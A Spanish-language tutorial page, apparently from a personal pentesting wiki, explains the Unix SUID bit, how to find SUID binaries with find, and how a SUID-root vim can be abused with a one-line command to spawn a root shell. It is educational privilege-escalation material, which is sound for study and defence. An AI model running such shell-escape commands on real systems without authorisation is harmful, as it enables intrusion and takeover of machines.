> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/docs/escalada-de-privilegios/permisos-suid.md).

# Permisos SUID

## Introducción

En sistemas Unix y Linux, el bit **SUID** (Set User ID) permite que un ejecutable se ejecute con los privilegios del **propietario del archivo**, en lugar del usuario que lo ejecuta. Si un binario con SUID es propiedad de **root**, su ejecución puede otorgar privilegios elevados temporalmente.

Esto se convierte en una vulnerabilidad cuando binarios inseguros o mal configurados tienen este bit activado.

***

## ¿Qué es el bit SUID?

Cuando un archivo tiene el bit SUID activado, su modo de permisos se verá así:

```bash
-rwsr-xr-x 1 root root 123456 feb 20 12:00 /usr/bin/passwd
```

* El **`s`** en lugar de la `x` en la parte de usuario indica que está activo el **Set User ID**.
* El archivo se ejecutará con los privilegios de su **propietario** (en este caso, root), sin importar quién lo ejecute.

***

## Cómo buscar archivos SUID

Puedes encontrar todos los archivos con SUID en el sistema usando el siguiente comando:

```bash
find / -perm -4000 -type f 2>/dev/null
```

* `/`: busca desde la raíz
* `-perm -4000`: busca archivos con el bit SUID activado
* `-type f`: solo archivos
* `2>/dev/null`: oculta errores de permisos

***

## Explotación

**Binarios conocidos vulnerables**

Algunos binarios comunes pueden ser explotados si tienen SUID activado. Por ejemplo:

```bash
-rwsr-xr-x 1 root root 123456 abr 10 10:00 /usr/bin/vim
```

Si un atacante puede ejecutar `vim` con SUID root, puede invocar una shell:

```bash
vim -c ':!bash'
```

Y tendrá acceso como root. Para saber cómo abusar de un binario específico con SUID, puedes consultar GTFOBins.

***

## Más Información

* [GTFOBins - SUID](https://gtfobins.github.io/#+suid)
* [HackTricks](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html?highlight=SUID#sudo-and-suid)
